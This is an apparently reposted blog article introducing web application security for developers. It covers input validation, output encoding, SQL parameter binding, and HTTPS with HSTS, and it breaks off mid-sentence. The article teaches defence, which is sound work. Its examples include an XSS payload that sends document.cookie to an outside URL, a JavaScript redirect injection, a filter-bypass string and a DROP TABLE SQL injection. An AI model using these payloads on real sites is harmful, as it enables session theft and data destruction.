Ketan's Home

August 27, 2016

Basics of Web Application Security: Authentication

Filed under: Uncategorized — ketan @ 3:04 PM

The modern software developer has to be something of a Swiss Army knife. Of course,
you need to write code that fulfills customer functional requirements. It needs to be
fast. Further you are expected to write this code to be comprehensible and extensible:
sufficiently flexible to allow for the evolutionary nature of IT demands, but stable
and reliable. You need to be able to lay out a useable interface, optimize a database,
and often set up and maintain a delivery pipeline. You need to be able to get these
things done by yesterday.

Somewhere, way down at the bottom of the list of requirements, behind fast, cheap,
and flexible, is “secure”. That is, until something goes wrong, until the system you
build is compromised, then suddenly security is, and always was, the most important
thing.

Security is a cross-functional concern a bit like Performance. And a bit unlike
Performance. Like Performance, our business owners often know they need Security, but
aren’t always sure how to quantify it. Unlike Performance, they often don’t know
“secure enough” when they see it.

So how can a developer work in a world of vague security requirements and unknown
threats? Advocating for defining those requirements and identifying those threats is a
worthy exercise, but one that takes time and therefore money. Much of the time,
developers will operate in the absence of specific security requirements; while their
organization grapples with how to introduce security concerns into the
requirements intake process, they will still build systems and write code.

In this Evolving Publication, we will:

  • point out common areas in a web application where developers need to be particularly conscious of security risks
  • provide guidance for how to address each risk on common web stacks
  • highlight common mistakes developers make, and how to avoid them

Security is a massive topic, even if we reduce the scope to only browser-based web
applications. These articles will be closer to a “best-of” than a comprehensive
catalog of everything you need to know, but we hope it will provide a directed first
step for developers who are trying to ramp up fast.


Trust

Before jumping into the nuts and bolts of input and output, it’s worth mentioning
one of the most crucial underlying principles of security: trust. We have to ask
ourselves: do we trust the integrity of requests coming in from the user’s browser?
(hint: we don’t). Do we trust that upstream services have done the work to make our
data clean and safe? (hint: nope). Do we trust that the connection between the user’s
browser and our application cannot be tampered with? (hint: not completely…). Do we
trust the services and data stores we depend on? (hint: we might…)

Of course, like security, trust is not binary, and we need to assess our risk
tolerance, the criticality of our data, and how much we need to invest to feel
comfortable with how we have managed our risk. In order to do that in a disciplined
way, we probably need to go through threat and risk modeling processes, but that’s a
complicated topic to be addressed in another article. For now, suffice it to say
that we will identify a series of risks to our system, and now that they are
identified, we will have to address the threats that arise.


Reject Unexpected Form Input

HTML forms can create the illusion of controlling input. The form markup author
might believe that, because they are restricting the types of values a user can
enter in the form, the data will conform to those restrictions. But rest assured, it
is no more than an illusion. Even client-side JavaScript form validation provides
absolutely no value from a security perspective.

Untrusted Input

On our scale of trust, data coming from the user’s browser, whether we are
providing the form or not, and regardless of whether the connection is
HTTPS-protected, is effectively zero. The user could very easily modify the markup
before sending it, or use a command line application like curl to submit unexpected
data. Or a perfectly innocent user could be unwittingly submitting a modified version
of a form from a hostile website. Same Origin Policy
doesn’t prevent a hostile site from submitting to your form handling endpoint. In
order to ensure the integrity of incoming data, validation needs to be handled on the
server.

But why is malformed data a security concern? Depending on your application logic and use of output encoding,
you are inviting the possibility of unexpected behavior, leaked data, and even giving
an attacker a way to break the boundary between input data and executable code.

For example, imagine that we have a form with a radio button that allows the user
to select a communication preference. Our form handling code has application logic
with different behavior depending on those values.

final String communicationType = req.getParameter("communicationType");
if ("email".equals(communicationType)) {
    sendByEmail();
} else if ("text".equals(communicationType)) {
    sendByText();
} else {
    sendError(resp, format("Can't send by type %s", communicationType));
}

This code may or may not be dangerous, depending on how the
sendError method is implemented. We are trusting that downstream logic processes untrusted content
correctly. It might. But it might not. We’re much better off if we can eliminate the
possibility of unanticipated control flow entirely.

So what can a developer do to minimize the danger that untrusted input will
have undesirable effects in application code? Enter input validation.

Input Validation

Input validation is the process of ensuring input data is consistent with application
expectations. Data that falls outside of an expected set of values can cause our
application to yield unexpected results, for example violating business logic,
triggering faults, and even allowing an attacker to take control of resources or the
application itself. Input that is evaluated on the server as executable code, such as a
database query, or executed on the client as HTML or JavaScript, is particularly dangerous.
Validating input is an important first line of defense to protect against this risk.

Developers often build applications with at least some basic input validation, for
example to ensure a value is non-null or an integer is positive. Thinking about how to
further limit input to only logically acceptable values is the next step toward reducing
risk of attack.

Input validation is more effective for inputs that can be restricted to a
small set. Numeric types can typically be restricted to values within a specific range.
For example, it doesn’t make sense for a user to request to transfer a negative amount
of money or to add several thousand items to their shopping cart. This strategy of limiting
input to known acceptable types is known as positive validation or
whitelisting. A whitelist could restrict input to a string of a specific form,
such as a URL or a date of the form “yyyy/mm/dd”. It could limit input to a maximum
length, a single acceptable character encoding, or, for the example above, only the
values that are available in your form.
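The radio-button example from earlier can be enforced with a tiny whitelist. Below is a minimal sketch; the `ALLOWED_TYPES` set and the validator class are illustrative names, not part of any framework:

```java
import java.util.Set;

public class CommunicationTypeValidator {
    // Positive validation: only the values actually rendered in the form are accepted.
    private static final Set<String> ALLOWED_TYPES = Set.of("email", "text");

    public static boolean isValidCommunicationType(String input) {
        // Reject null and anything outside the whitelist.
        return input != null && ALLOWED_TYPES.contains(input);
    }

    public static void main(String[] args) {
        System.out.println(isValidCommunicationType("email"));                    // true
        System.out.println(isValidCommunicationType("<script>alert(1)</script>")); // false
    }
}
```

With a check like this in place before the dispatch logic runs, the `sendError` branch never sees attacker-controlled text at all.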

Another way of thinking of input validation is that it is enforcement of the
contract your form handling code has with its consumer. Anything violating that
contract is invalid and therefore rejected. The more restrictive your contract, and
the more aggressively it is enforced, the less likely your application is to fall prey
to security vulnerabilities that arise from unanticipated conditions.

You are going to have to make a choice about exactly what to do when input fails
validation. The most restrictive, and arguably most desirable, option is to reject it
entirely, without feedback, and make sure the incident is noted through logging or
monitoring. But why without feedback? Should we provide our user with information
about why the data is invalid? It depends a bit on your contract. In the form example
above, if you receive any value other than "email" or "text", something funny is
going on: you either have a bug or you are being attacked. Further, the feedback
mechanism might provide a point of attack. Imagine the sendError method writes the
text back to the screen as an error message like "We’re unable to respond with
communicationType". That’s all fine if the communicationType is "carrier pigeon",
but what happens if it looks like this?

<script>new Image().src = 'http://ift.tt/1lWX1Hd?' + document.cookie</script>

You’re now faced with the possibility of a reflected XSS attack that steals session
cookies. If you must provide user feedback, you are best served with a canned response that
doesn’t echo back untrusted user data, for example "You must choose email or text". If you
really can’t avoid rendering the user’s input back at them, make absolutely sure it’s
properly encoded (see below for details on output encoding).

In Practice

It might be tempting to try filtering the <script> tag to
thwart this attack. Rejecting input that contains known dangerous values is
a strategy referred to as negative validation or blacklisting.
The trouble with this approach is that the number of possible bad inputs is extremely
large. Maintaining a complete list of potentially dangerous input would be a costly
and time-consuming endeavor, and the list would need to be updated continually as new
attack techniques emerge. But
sometimes it’s your only option, for example in cases of free-form input. If you must
blacklist, be very careful to cover all your cases, write good tests, be as restrictive
as you can, and reference OWASP’s XSS Filter Evasion Cheat Sheet
to learn common methods attackers will use to circumvent your protections.

Resist the temptation to filter out invalid input. This is a practice commonly called
"sanitization". It is essentially a blacklist that removes undesirable input rather
than rejecting it. Like other blacklists, it is hard to get right and provides the
attacker with more opportunities to evade it. For example, imagine, in the case above,
you choose to filter out <script> tags. An attacker could bypass it
with something as simple as:

<scr<script>ipt>

Your filter dutifully removes the inner <script> tag, and in doing so splices the
surrounding fragments into exactly the <script> tag it was meant to eliminate,
reintroducing the vulnerability.
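The failure mode is easy to demonstrate. Here is a contrived sketch of such a naive sanitizer (the class and method names are illustrative, not from any library):

```java
public class SanitizerBypass {
    // A naive "sanitizer" that deletes literal <script> tags.
    static String sanitize(String input) {
        return input.replace("<script>", "");
    }

    public static void main(String[] args) {
        // The attacker nests the tag inside itself...
        String payload = "<scr<script>ipt>";
        // ...and removing the inner tag splices the halves back together.
        System.out.println(sanitize(payload)); // prints "<script>"
    }
}
```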

Input validation functionality is built in to most modern frameworks and, when
absent, can also be found in external libraries that enable the developer to apply
multiple constraints as rules on a per-field basis. Built-in validation
of common patterns like email addresses and credit card numbers is a helpful
bonus. Using your web framework’s validation provides the additional advantage of
pushing the validation logic to the very edge of the web tier, causing invalid data
to be rejected before it ever reaches complex application code where critical mistakes
are easier to make.

Framework approaches:

  • Java: Hibernate (Bean Validation), ESAPI
  • Spring: built-in type-safe params in Controller; built-in Validator interface (Bean Validation)
  • Ruby on Rails: built-in Active Record Validators
  • ASP.NET: built-in Validation (see BaseValidator)
  • Play: built-in Validator
  • Generic JavaScript: xss-filters
  • NodeJS: validator-js
  • General: regex-based validation on application inputs

In Summary

  • Whitelist when you can
  • Blacklist when you can’t whitelist
  • Keep your contract as restrictive as possible
  • Make sure you alert about possible attacks
  • Avoid reflecting input back to a user
  • Reject web content before it gets deeper into application logic to
    minimize ways to mishandle untrusted data or, even better, use your web
    framework to whitelist input

Although this section focused on using input validation as a mechanism for protecting
your form handling code, any code that handles input from an untrusted source can be
validated in much the same way, whether the message is JSON, XML, or any other format,
and regardless of whether it’s a cookie, a header, or a URL parameter. Remember:
if you don’t control it, you can’t trust it. If it violates the contract, reject it!


Encode HTML Output

In addition to limiting data coming into an application, web application developers
need to pay close attention to the data as it comes out. A modern web application
usually has basic HTML markup for document structure, CSS for document style,
JavaScript for application logic, and user-generated content which can be any of
these things. It’s all text. And it’s often all rendered to the same document.

An HTML document is really a collection of nested execution contexts separated by
tags, like <script> or <style>. The developer
is always one errant angle bracket away from running in a very different execution
context than they intend. This is further complicated when you have additional
context-specific content embedded within an execution context. For example, both
HTML and JavaScript can contain a URL, each with rules all their own.

Output Risks

HTML is a very, very permissive format. Browsers try their best to render
the content, even if it is malformed. That may seem beneficial to the developer since
a bad bracket doesn’t just explode in an error, however, the rendering of badly formed
markup is a major source of vulnerabilities. Attackers have the luxury of injecting
content into your pages to break through execution contexts, without even having to worry
about whether the page is valid.

Handling output correctly isn’t strictly a security concern. Applications rendering
data from sources like databases and upstream services need to ensure that the
content doesn’t break the application, but risk becomes particularly high when rendering
content from an untrusted source. As mentioned in the prior section, developers should be rejecting
input that falls outside the bounds of the contract, but what do we do when we need
to accept input containing characters that have the potential to change our code, like
a single quote ("'") or open bracket ("<")? This is
where output encoding comes in.

Output Encoding

Output encoding is converting outgoing data to a final output format. The
complication with output encoding is that you need a different codec depending on how
the outgoing data is going to be consumed. Without appropriate output encoding, an
application could provide its client with misformatted data making it unusable, or
even worse, dangerous. An attacker who stumbles across insufficient or inappropriate
encoding knows that they have a potential vulnerability that might allow them to
fundamentally alter the structure of the output from the intent of the developer.
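To make the idea concrete, here is a minimal sketch of encoding for an HTML context. This hand-rolled helper is illustrative only; in practice you should prefer your framework's encoder or a vetted library such as the OWASP Java Encoder:

```java
public class HtmlEncoder {
    // Minimal HTML entity encoding for the five reserved characters.
    // Illustrative only -- prefer your framework's encoder in real code.
    static String encodeForHtml(String input) {
        return input
                .replace("&", "&amp;")   // must run first, or it re-encodes entities
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("\"", "&quot;")
                .replace("'", "&#39;");
    }

    public static void main(String[] args) {
        System.out.println(encodeForHtml("<script>alert('xss')</script>"));
        // &lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;
    }
}
```

Note the ordering constraint in even this tiny codec: ampersands must be encoded before anything else, or the encoder corrupts its own output. Details like this are why vetted library encoders beat hand-rolled ones.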

For example, imagine that one of the first customers of a system is the former
Supreme Court Justice Sandra Day O’Connor. What happens if her name is rendered into
HTML?

<p>The Honorable Justice Sandra Day O'Connor</p>

renders as:

The Honorable Justice Sandra Day O'Connor

All is right with the world. The page is generated as we would expect. But this
could be a fancy dynamic UI with a model/view/controller architecture. These strings are
going to show up in JavaScript, too. What happens when the page outputs this to the
browser?

document.getElementById('name').innerText = 'Sandra Day O'Connor' //<--unescaped string

The result is malformed JavaScript. This is what hackers look for to break through
execution context and turn innocent data into dangerous executable code. If the
Justice enters her name as

Sandra Day O';window.location='http://ift.tt/22S88jO';

suddenly our user has been pushed to a hostile site. If, however, we correctly
encode the output for a JavaScript context, the text will look like this:

'Sandra Day O\';window.location=\'http://ift.tt/22S88jO\';'

A bit confusing, perhaps, but a perfectly harmless, non-executable string. Note that
there are a couple of strategies for encoding JavaScript. This particular encoding uses
escape sequences to represent the apostrophe ("\'"), but it could
also be represented safely with the Unicode escape sequence ("\u0027").
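A sketch of this escape-sequence strategy for a single-quoted JavaScript string context might look like the following. It is deliberately incomplete (a production encoder also handles double quotes, newlines, "</script>" sequences, and more), and the attacker URL is a hypothetical placeholder:

```java
public class JsStringEncoder {
    // Backslash-escape characters that could terminate a single-quoted JS string.
    // Incomplete by design: production encoders handle many more characters.
    static String encodeForJsString(String input) {
        return input
                .replace("\\", "\\\\")  // escape the escape character first
                .replace("'", "\\'");
    }

    public static void main(String[] args) {
        String name = "Sandra Day O';window.location='http://attacker.example';";
        System.out.println("'" + encodeForJsString(name) + "'");
        // 'Sandra Day O\';window.location=\'http://attacker.example\';'
    }
}
```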

The good news is that most modern web frameworks have mechanisms for rendering
content safely and escaping reserved characters. The bad news is that most of these
frameworks include a mechanism for circumventing this protection and developers often
use them either due to ignorance or because they are relying on them to render
executable code that they believe to be safe.

Cautions and Caveats

There are so many tools and frameworks these days, and so many encoding contexts
(e.g. HTML, XML, JavaScript, PDF, CSS, SQL, etc.), that creating a comprehensive list
is infeasible, however, below is a starter for what to use and avoid for encoding HTML
in some common frameworks.

If you are using another framework, check the documentation for safe output
encoding functions. If the framework doesn’t have them, consider changing frameworks
to something that does, or you’ll have the unenviable task of creating output
encoding code on your own. Also note that just because a framework renders HTML
safely doesn’t mean it’s going to render JavaScript or PDFs safely. You need to be
aware of the context a particular encoding tool is written for.

Be warned: you might be tempted to take the raw user input, and do the encoding
before storing it. This pattern will generally bite you later on.
If you were to encode the text as HTML prior to storage, you can run into problems if
you need to render the data in another format: it can force you to unencode the HTML,
and re-encode into the new output format. This adds a great deal of complexity and
encourages developers to write application code that unescapes the content,
making all the tricky upstream output encoding effectively useless. You are much better
off storing the data in its most raw form, then handling encoding at rendering time.

Finally, it’s worth noting that nested rendering contexts add an enormous amount
of complexity and should be avoided whenever possible. It’s hard enough to get a single
output string right, but when you are rendering a URL, in HTML within JavaScript, you
have three contexts to worry about for a single string. If you absolutely cannot avoid
nested contexts, make sure to de-compose the problem into separate stages, thoroughly
test each one, and pay special attention to the order of rendering. OWASP provides
some guidance for this situation in the DOM based XSS Prevention Cheat Sheet.

In Summary

  • Output encode all application data on output with an appropriate codec
  • Use your framework’s output encoding capability, if available
  • Avoid nested rendering contexts as much as possible
  • Store your data in raw form and encode at rendering time
  • Avoid unsafe framework and JavaScript calls that bypass encoding

Bind Parameters for Database Queries

Whether you are writing SQL against a relational database, using an object-relational
mapping framework, or querying a NoSQL database, you probably need to
worry about how input data is used within your queries.

The database is often the most crucial part of any web application since it
contains state that can’t be easily restored. It can contain crucial and sensitive
customer information that must be protected. It is the data that drives the
application and runs the business. So you would expect developers to take the most
care when interacting with their database, and yet injection into the database tier
continues to plague the modern web application even though it’s relatively easy
to prevent!

Little Bobby Tables

No discussion of parameter binding would be complete without including the famous
2007 "Little Bobby Tables" issue of xkcd ("Exploits of a Mom").

To decompose this comic, imagine the system responsible for keeping track of
grades has a function for adding new students:

void addStudent(String lastName, String firstName) {
    String query = "INSERT INTO students (last_name, first_name) VALUES ('"
            + lastName + "', '" + firstName + "')";
    getConnection().createStatement().execute(query);
}

If addStudent is called with parameters "Fowler", "Martin", the resulting SQL is:

INSERT INTO students (last_name, first_name) VALUES ('Fowler', 'Martin')

But with Little Bobby’s name the following SQL is executed:

INSERT INTO students (last_name, first_name) VALUES ('XKCD', 'Robert'); DROP TABLE Students;-- ')

In fact, two commands are executed:

INSERT INTO students (last_name, first_name) VALUES ('XKCD', 'Robert')

DROP TABLE Students

The final "--" comments out the remainder of the original query, ensuring the SQL
syntax is valid. Et voilà, the DROP is executed. This attack vector allows the user
to execute arbitrary SQL within the context of the application’s database user.
In other words, the attacker can do anything the application can do and more, which
could result in attacks that cause greater harm than a DROP, including violating data
integrity, exposing sensitive information or inserting executable code. Later we
will talk about defining different users as a secondary defense against this kind
of mistake, but for now, suffice to say that there is a very simple application-level
strategy for minimizing injection risk.

Parameter Binding to the Rescue

To quibble with Hacker Mom’s solution, sanitizing is very difficult to get right,
creates new potential attack vectors, and is certainly not the right approach. Your
best, and arguably only decent, option is parameter binding. JDBC, for example,
provides the PreparedStatement.setXXX() methods for this very purpose.
Parameter binding provides a means of separating executable code, such as SQL, from
content, transparently handling content encoding and escaping.

void addStudent(String lastName, String firstName) {
    PreparedStatement stmt = getConnection().prepareStatement(
            "INSERT INTO students (last_name, first_name) VALUES (?, ?)");
    stmt.setString(1, lastName);
    stmt.setString(2, firstName);
    stmt.execute();
}

Any full-featured data access layer will have the ability to bind variables and
defer implementation to the underlying protocol. This way, the developer doesn’t need
to understand the complexities that arise from mixing user input with executable code.
For this to be effective, all untrusted inputs need to be bound. If SQL is built
through concatenation, interpolation, or formatting methods, no part of the resulting
string should come from user input.

Clean and Safe Code

Sometimes we encounter situations where there is tension between good security and
clean code. Security sometimes requires the programmer to add some complexity in order
to protect the application. In this case however, we have one of those fortuitous
situations where good security and good design are aligned. In addition to
protecting the application from injection, introducing bound parameters improves
comprehensibility by providing clear boundaries between code and content, and
simplifies creating valid SQL by eliminating the need to manage the quotes by hand.

As you introduce parameter binding to replace your string formatting or
concatenation, you may also find opportunities to introduce generalized binding
functions to the code, further enhancing code cleanliness and security. This
highlights another place where good design and good security overlap: de-duplication
leads to additional testability, and reduction of complexity.

Common Misconceptions

There is a misconception that stored procedures prevent SQL injection, but that
is only true insofar as parameters are bound inside the stored procedure. If the
stored procedure itself does string concatenation it can be injectable as well,
and binding the variable from the client won’t save you.

Similarly, object-relational mapping frameworks like ActiveRecord, Hibernate, or
.NET Entity Framework, won’t protect you unless you are using binding functions.
If you are building your queries using untrusted input without binding, the app
still could be vulnerable to an injection attack.

For more detail on the injection risks of stored procedures and ORMs, see security
analyst Troy Hunt’s article
"Stored procedures and ORMs won’t save you from SQL injection".

Finally, there is a misconception that NoSQL databases are not susceptible to
injection attack and that is not true. All query languages, SQL or otherwise, require
a clear separation between executable code and content so the execution doesn’t
confuse the command from the parameter. Attackers look for points in the runtime
where they can break through those boundaries and use input data to change the
intended execution path. Even MongoDB, whose binary wire protocol and
language-specific API reduce the opportunities for text-based injection attacks,
exposes the "$where" operator, which is vulnerable to injection, as demonstrated in
this article from the OWASP Testing Guide.
The bottom line is that you need to check the data store and driver documentation
for safe ways to handle input data.
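The MongoDB point can be made concrete without a running database by comparing the shape of the two queries. The payload string below is a hypothetical attacker input, and the helper methods are illustrative, not driver APIs:

```java
import java.util.Map;

public class MongoQueryShapes {
    // Safe shape: the input is a *value* in a structured query document.
    // A driver serializes it as data; it can never become an operator or code.
    static Map<String, Object> safeQuery(String lastName) {
        return Map.of("lastName", lastName);
    }

    // Dangerous shape: the input is concatenated into a $where JavaScript
    // string, where it can escape the quoting and rewrite the query's logic.
    static String dangerousWhere(String lastName) {
        return "this.lastName == '" + lastName + "'";
    }

    public static void main(String[] args) {
        String payload = "'; return true; var x='"; // hypothetical attacker input
        System.out.println(safeQuery(payload));      // payload stays an inert value
        System.out.println(dangerousWhere(payload)); // payload becomes JavaScript
    }
}
```

In the structured form the payload can only ever match (or fail to match) a last name; in the concatenated form it changes what the query means.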

Parameter Binding Functions

Check the matrix below for indication of safe binding functions of your chosen data
store. If it is not included in this list, check the product documentation.

Parameter binding by framework:

  • Raw JDBC — Encoded: Connection.prepareStatement() used with setXXX()
    methods and bound parameters for all input. Dangerous: any query or update
    method called with string concatenation rather than binding.
  • PHP / MySQLi — Encoded: prepare() used with bind_param for all input.
    Dangerous: any query or update method called with string concatenation
    rather than binding.
  • MongoDB — Encoded: basic CRUD operations such as find() and insert(),
    with BSON document field names controlled by the application. Dangerous:
    operations, including find, when field names are allowed to be determined
    by untrusted data, or use of Mongo operations such as "$where" that allow
    arbitrary JavaScript conditions.
  • Cassandra — Encoded: Session.prepare used with BoundStatement and bound
    parameters for all input. Dangerous: any query or update method called
    with string concatenation rather than binding.
  • Hibernate / JPA — Encoded: SQL or JPQL/OQL with bound parameters via
    setParameter. Dangerous: any query or update method called with string
    concatenation rather than binding.
  • ActiveRecord — Encoded: condition functions (find_by, where) used with
    hashes or bound parameters, e.g.:

        where(foo: bar)
        where("foo = ?", bar)

    Dangerous: condition functions used with string concatenation or
    interpolation:

        where("foo = '#{bar}'")
        where("foo = '" + bar + "'")

In Summary

  • Avoid building SQL (or NoSQL equivalent) from user input
  • Bind all parameterized data, both queries and stored procedures
  • Use the native driver binding function rather than trying to handle the encoding yourself
  • Don’t think stored procedures or ORM tools will save you. You need to use
    binding functions for those, too
  • NoSQL doesn’t make you injection-proof

Protect Data in Transit

While we’re on the subject of input and output, there’s another important consideration: the
privacy and integrity of data in transit. When using an ordinary HTTP connection, users are
exposed to many risks arising from the fact data is transmitted in plaintext. An attacker
capable of intercepting network traffic anywhere between a user’s browser and a server can
eavesdrop or even tamper with the data completely undetected in a man-in-the-middle attack.
There is no limit to what the attacker can do, including stealing the user’s session or their
personal information, injecting malicious code that will be executed by the browser in the
context of the website, or altering data the user is sending to the server.

We can’t usually control the network our users choose to use. They very well might be using
a network where anyone can easily watch their traffic, such as an open wireless network in a
café or on an airplane. They might have unsuspectingly connected to a hostile wireless network
with a name like "Free Wi-Fi" set up by an attacker in a public place. They might be using an
internet provider that injects content such as ads into their web traffic, or they might even
be in a country where the government routinely surveils its citizens.

If an attacker can eavesdrop on a user or tamper with web traffic, all bets are off. The
data exchanged cannot be trusted by either side. Fortunately for us, we can protect against
many of these risks with HTTPS.

HTTPS and Transport Layer Security

HTTPS was originally used mainly to secure sensitive web traffic such as financial
transactions, but it is now common to see it used by default on many sites we use in our day
to day lives such as social networking and search engines. The HTTPS protocol uses the
Transport Layer Security (TLS) protocol, the successor to the Secure Sockets Layer (SSL)
protocol, to secure communications. When configured and used correctly, it provides
protection against eavesdropping and tampering, along with a reasonable guarantee that a
website is the one we intend to be using. Or, in more technical terms, it provides
confidentiality and data integrity, along with authentication of the website’s identity.

With the many risks we all face, it increasingly makes sense to treat all network traffic
as sensitive and encrypt it. When dealing with web traffic, this is done using HTTPS. Several
browser makers have announced their intent to deprecate non-secure HTTP and even display
visual indications to users to warn them when a site is not using HTTPS. Most HTTP/2
implementations in browsers will only support communicating over TLS. So why aren’t we using
it for everything now?

There have been some hurdles that impeded adoption of HTTPS. For a long time, it was
perceived as being too computationally expensive to use for all traffic, but with modern
hardware that has not been the case for some time. The SSL protocol and early versions of the
TLS protocol only support the use of one web site certificate per IP address, but that
restriction was lifted in TLS with the introduction of a protocol extension called SNI
(Server Name Indication), which is now supported in most browsers. The cost of obtaining a
certificate from a certificate authority also deterred adoption, but the introduction of free
services like Let’s Encrypt has eliminated that barrier. Today there are fewer hurdles than
ever before.

Get a Server Certificate

The ability to authenticate the identity of a website underpins the security of TLS. In
the absence of the ability to verify that a site is who it says it is, an attacker capable of
doing a man-in-the-middle attack could impersonate the site and undermine any other
protection the protocol provides.

When using TLS, a site proves its identity using a public key certificate. This
certificate contains information about the site along with a public key that is used to prove
that the site is the owner of the certificate, which it does using a corresponding private
key that only it knows. In some systems a client may also be required to use a certificate to
prove its identity, although this is relatively rare in practice today due to complexities in
managing certificates for clients.

Unless the certificate for a site is known in advance, a client needs some way to verify
that the certificate can be trusted. This is done based on a model of trust. In web browsers
and many other applications, a trusted third party called a Certificate Authority (CA) is
relied upon to verify the identity of a site and sometimes of the organization that owns it,
then grant a signed certificate to the site to certify it has been verified.

It isn’t always necessary to involve a trusted third party if the certificate is known in
advance by sharing it through some other channel. For example, a mobile app or other
application might be distributed with a certificate or information about a custom CA that
will be used to verify the identity of the site. This practice is referred to as certificate
or public key pinning and is outside the scope of this article.

The most visible indicator of security that many web browsers display is when
communications with a site are secured using HTTPS and the certificate is trusted. Without
it, a browser will display a warning about the certificate and prevent a user from viewing
your site, so it is important to get a certificate from a trusted CA.

It is possible to generate your own certificate to test an HTTPS configuration, but you
will need a certificate signed by a trusted CA before exposing the service to users. For many
uses, a free CA is a good starting point. When searching for a CA, you will encounter
different levels of certification offered. The most basic, Domain Validation (DV), certifies
the owner of the certificate controls a domain. More costly options are Organization
Validation (OV) and Extended Validation (EV), which involve the CA doing additional checks to
verify the organization requesting the certificate. Although the more advanced options result
in a more positive visual indicator of security in the browser, it may not be worth the extra
cost for many.

Configure Your Server

With a certificate in hand, you can begin to configure your server to support HTTPS. At
first glance, this may seem like a task worthy of someone who holds a PhD in cryptography.
You may want to choose a configuration that supports a wide range of browser versions, but
you need to balance that with providing a high level of security and maintaining some level
of performance.

The cryptographic algorithms and protocol versions supported by a site have a strong
impact on the level of communications security it provides. Attacks with impressive sounding
names like FREAK and DROWN and POODLE (admittedly, the last one doesn’t sound all that
formidable) have shown us that supporting dated protocol versions and algorithms presents a
risk of browsers being tricked into using the weakest option supported by a server, making
attack much easier. Advancements in computing power and our understanding of the mathematics
underlying algorithms also renders them less safe over time. How can we balance staying up to
date with making sure our website remains compatible for a broad assortment of users who
might be using dated browsers that only support older protocol versions and algorithms?
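One side of that balance can be pinned down in code. As a minimal sketch (not a full hardening guide), Python's standard ssl module lets a server set a protocol floor; the certificate paths shown are illustrative assumptions:

```python
import ssl

def make_tls_context(certfile=None, keyfile=None):
    # Server-side TLS context that refuses the dated protocol versions
    # exploited by downgrade attacks such as POODLE.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    if certfile:
        # e.g. certfile="server.pem", keyfile="server.key" (hypothetical paths)
        ctx.load_cert_chain(certfile, keyfile)
    return ctx
```

Cipher suite selection would be layered on top of a context like this, and is exactly the sort of detail the configuration tools discussed next take care of.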

Fortunately, there are tools that help make the job of selection a lot easier. Mozilla has
a helpful SSL Configuration Generator to
generate recommended configurations for various web servers, along with a complementary Server Side TLS Guide with more in-depth
details.

Note that the configuration generator mentioned above enables a browser security feature
called HSTS by default, which might cause problems until you’re ready to commit to using
HTTPS for all communications long term. We’ll discuss HSTS a little later in this article.

Use HTTPS for Everything

It is not uncommon to encounter a website where HTTPS is used to protect only some of the
resources it serves. In some cases the protection might only be extended to handling form
submissions that are considered sensitive. Other times, it might only be used for resources
that are considered sensitive, for example what a user might access after logging into the
site. Occasionally you might even come across a security article published on a site whose
server team hasn’t had time to update their configuration yet – but they will soon, we
promise!

The trouble with this inconsistent approach is that anything that isn’t served over HTTPS
remains susceptible to the kinds of risks that were outlined earlier. For example, an
attacker doing a man-in-the-middle attack could simply alter the form mentioned above to
submit sensitive data over plaintext HTTP instead. If the attacker injects executable code
that will be executed in the context of our site, it isn’t going to matter much that part of
it is protected with HTTPS. The only way to prevent those risks is to use HTTPS for
everything.

The solution isn’t quite as clean cut as flipping a switch and serving all resources over
HTTPS. Web browsers default to using HTTP when a user enters an address into their address
bar without typing "https://" explicitly. As a result, simply shutting down the HTTP
network port is rarely an option. Websites instead conventionally redirect requests received
over HTTP to use HTTPS, which is perhaps not an ideal solution, but often the best one
available.

For resources that will be accessed by web browsers, adopting a policy of redirecting all
HTTP requests to those resources is the first step towards using HTTPS consistently. For
example, in Apache redirecting all requests to a path (in the example, /content and anything
beneath it) can be enabled with a few simple lines:

# Redirect requests to /content to use HTTPS (mod_rewrite is required)
RewriteEngine On
RewriteCond %{HTTPS} !=on [NC]
RewriteCond %{REQUEST_URI} ^/content(/.*)?
RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [R,L]

If your site also serves APIs over HTTP, moving to using HTTPS can require a more measured
approach. Not all API clients are able to handle redirects. In this situation it is advisable
to work with consumers of the API to switch to using HTTPS and to plan a cutoff date, then
begin responding to HTTP requests with an error after the date is reached.
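The same policy can also live in application code. Below is a sketch of a framework-agnostic WSGI middleware that mirrors this approach: browser-facing paths get a redirect, while API paths (whose clients may not follow redirects) get an error once the cutoff date has passed. The /api prefix is an assumption for illustration.

```python
def enforce_https(app, api_prefix="/api"):
    # Wraps a WSGI app: pass HTTPS requests through, redirect plain-HTTP
    # browser traffic, and reject plain-HTTP API calls outright.
    def middleware(environ, start_response):
        if environ.get("wsgi.url_scheme") == "https":
            return app(environ, start_response)
        path = environ.get("PATH_INFO", "")
        if path.startswith(api_prefix):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"HTTPS is required for this API\n"]
        # Query strings are omitted here for brevity.
        location = "https://" + environ["HTTP_HOST"] + path
        start_response("301 Moved Permanently", [("Location", location)])
        return [b""]
    return middleware
```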

Use HSTS

Redirecting users from HTTP to HTTPS presents the same risks as any other request sent
over ordinary HTTP. To help address this challenge, modern browsers support a powerful
security feature called HSTS (HTTP Strict Transport Security), which allows a website to
request that a browser only interact with it over HTTPS. It was first proposed in 2009 in
response to Moxie Marlinspike’s famous SSL stripping attacks, which demonstrated the dangers
of serving content over HTTP. Enabling it is as simple as sending a header in a response:

Strict-Transport-Security: max-age=15768000

The above header instructs the browser to only interact with the site using HTTPS for a
period of six months (specified in seconds). HSTS is an important feature to enable due to
the strict policy it enforces. Once enabled, the browser will automatically convert any
insecure HTTP requests to use HTTPS instead, even if a mistake is made or the user explicitly
types "http://" into their address bar. It also instructs the browser to disallow the user
from bypassing the warning it displays if an invalid certificate is encountered when loading
the site.

In addition to requiring little effort to enable in the browser, enabling HSTS on the
server side can require as little as a single line of configuration. For example, in Apache
it is enabled by adding a Header directive within the VirtualHost
configuration for port 443:

<VirtualHost *:443>
    ...

    # HSTS (mod_headers is required) (15768000 seconds = 6 months)
    Header always set Strict-Transport-Security "max-age=15768000"
</VirtualHost>

Now that you have an understanding of some of the risks inherent to ordinary HTTP, you
might be scratching your head wondering what happens when the first request to a website is
made over HTTP before HSTS can be enabled. To address this risk, some browsers allow websites
to be added to an "HSTS Preload List" that is included with the browsers. Once included in
this list it will no longer be possible for the website to be accessed using HTTP, even on
the first time a browser is interacting with the site.

Before deciding to enable HSTS, some potential challenges must first be considered. Most
